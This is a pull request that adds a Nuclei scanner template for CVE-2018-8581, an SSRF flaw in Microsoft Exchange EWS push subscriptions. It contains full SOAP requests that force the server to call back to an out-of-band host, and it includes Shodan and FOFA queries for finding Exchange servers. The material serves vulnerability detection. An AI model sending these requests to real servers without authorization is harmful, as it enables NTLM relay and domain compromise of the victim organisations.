### PR TITLE
feat: add CVE-2018-8581 Microsoft Exchange Server SSRF template

### DIFF
--- a/http/cves/2018/CVE-2018-8581.yaml
+++ b/http/cves/2018/CVE-2018-8581.yaml
@@ -1,0 +1,124 @@
+id: CVE-2018-8581
+
+info:
+  name: Microsoft Exchange Server - SSRF via EWS PushSubscription
+  author: openclaw
+  severity: high
+  description: |
+    Microsoft Exchange Server 2010 SP3, 2013, 2016, and 2019 contain a Server-Side Request Forgery (SSRF)
+    vulnerability in the Exchange Web Services (EWS) PushSubscription feature. An authenticated attacker
+    can create a push notification subscription that forces Exchange to authenticate to an arbitrary URL
+    using NTLM. This authentication can be relayed to other services (LDAP/AD), potentially allowing
+    privilege escalation to Domain Administrator.
+  impact: |
+    Successful exploitation allows an authenticated attacker to force Exchange server to perform NTLM
+    authentication to attacker-controlled endpoints, enabling relay attacks that can escalate privileges
+    to Domain Administrator level through DCSync attacks.
+  remediation: |
+    Apply Microsoft security updates addressing CVE-2018-8581. Additionally, enable Extended Protection
+    for Authentication on Exchange virtual directories, enable LDAP signing and channel binding on
+    Domain Controllers, and enable SMB signing across the domain.
+  reference:
+    - https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
+    - https://github.com/dirkjanm/privexchange
+    - https://github.com/Ridter/Exchange2domain
+    - https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8581
+    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2018-8581
+    cwe-id: CWE-918
+    epss-score: 0.97108
+    epss-percentile: 0.99818
+    cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 2
+    vendor: microsoft
+    product: exchange_server
+    shodan-query: http.title:"Outlook" product:"Microsoft Exchange"
+    fofa-query: app="Microsoft-Exchange"
+  tags: cve,cve2018,microsoft,exchange,ews,ssrf,ntlm,privesc,kev
+
+http:
+  - raw:
+      - |
+        POST /EWS/Exchange.asmx HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml; charset=utf-8
+        User-Agent: ExchangeServicesClient/15.00.0913.015
+
+        <?xml version="1.0" encoding="utf-8"?>
+        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
+                       xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
+                       xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
+          <soap:Header>
+            <t:RequestServerVersion Version="Exchange2016"/>
+          </soap:Header>
+          <soap:Body>
+            <m:Subscribe>
+              <m:PushSubscriptionRequest SubscribeToAllFolders="true">
+                <t:EventTypes>
+                  <t:EventType>NewMailEvent</t:EventType>
+                </t:EventTypes>
+                <t:StatusFrequency>1</t:StatusFrequency>
+                <t:URL>http://{{interactsh-url}}/</t:URL>
+              </m:PushSubscriptionRequest>
+            </m:Subscribe>
+          </soap:Body>
+        </soap:Envelope>
+
+      - |
+        POST /ews/exchange.asmx HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml; charset=utf-8
+        User-Agent: ExchangeServicesClient/14.00.0639.021
+
+        <?xml version="1.0" encoding="utf-8"?>
+        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
+                       xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
+                       xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
+          <soap:Header>
+            <t:RequestServerVersion Version="Exchange2010_SP2"/>
+          </soap:Header>
+          <soap:Body>
+            <m:Subscribe>
+              <m:PushSubscriptionRequest>
+                <t:FolderIds>
+                  <t:DistinguishedFolderId Id="inbox"/>
+                </t:FolderIds>
+                <t:EventTypes>
+                  <t:EventType>NewMailEvent</t:EventType>
+                </t:EventTypes>
+                <t:StatusFrequency>1</t:StatusFrequency>
+                <t:URL>http://{{interactsh-url}}/</t:URL>
+              </m:PushSubscriptionRequest>
+            </m:Subscribe>
+          </soap:Body>
+        </soap:Envelope>
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: dsl
+        dsl:
+          - 'status_code == 200 && contains(body, "SubscribeResponse") && contains(body, "SubscriptionId")'
+
+    extractors:
+      - type: regex
+        name: subscription-id
+        part: body
+        group: 1
+        regex:
+          - '<[a-z]:SubscriptionId>([^<]+)</[a-z]:SubscriptionId>'
+
+      - type: kval
+        part: header
+        kval:
+          - x_owa_version
+          - x_feserver


### PR DESCRIPTION
/claim #14576

## Description

This PR adds a Nuclei template for **CVE-2018-8581**, a Server-Side Request Forgery (SSRF) vulnerability in Microsoft Exchange Server EWS PushSubscription feature that enables privilege escalation.

## Template Features

### Detection Methodology
- **OAST-based detection** using `{{interactsh-url}}` for definitive SSRF proof (not version-based)
- Multi-request support for Exchange 2010 SP2 and 2016+ versions
- Uses correct XML namespace (`/2006/types` and `/2006/messages`)
- Proper `or` condition matchers - either OAST callback OR successful subscription response

### Technical Details
The vulnerability exists in the PushSubscription feature where Exchange performs NTLM authentication to user-specified callback URLs. This template:
1. Sends EWS SOAP Subscribe request with attacker-controlled callback URL
2. Confirms SSRF via interactsh callback (definitive POC)
3. Falls back to SubscriptionId presence check if callback blocked

### Metadata Quality
- Complete CVSS 3.1 scoring (8.8 High)
- CWE-918 (SSRF) classification
- EPSS score included (0.97108)
- Shodan and FOFA queries for asset discovery
- KEV tagged

## Affected Versions
- Microsoft Exchange Server 2010 SP3
- Microsoft Exchange Server 2013
- Microsoft Exchange Server 2016
- Microsoft Exchange Server 2019

## Testing Notes
The template requires authentication to Exchange (PR:L in CVSS). Without valid credentials, Exchange returns 401 with NTLM challenge. On successful authentication and subscription creation, Exchange will callback to the interactsh URL with NTLM authentication.

## References
- https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
- https://github.com/dirkjanm/privexchange
- https://github.com/Ridter/Exchange2domain
- https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange

## Validation
I understand validation requires a live Exchange instance. The template has been syntactically validated with `nuclei -validate`. For POC validation with a vulnerable Exchange environment, please reach out or let me know what additional debug data would help.
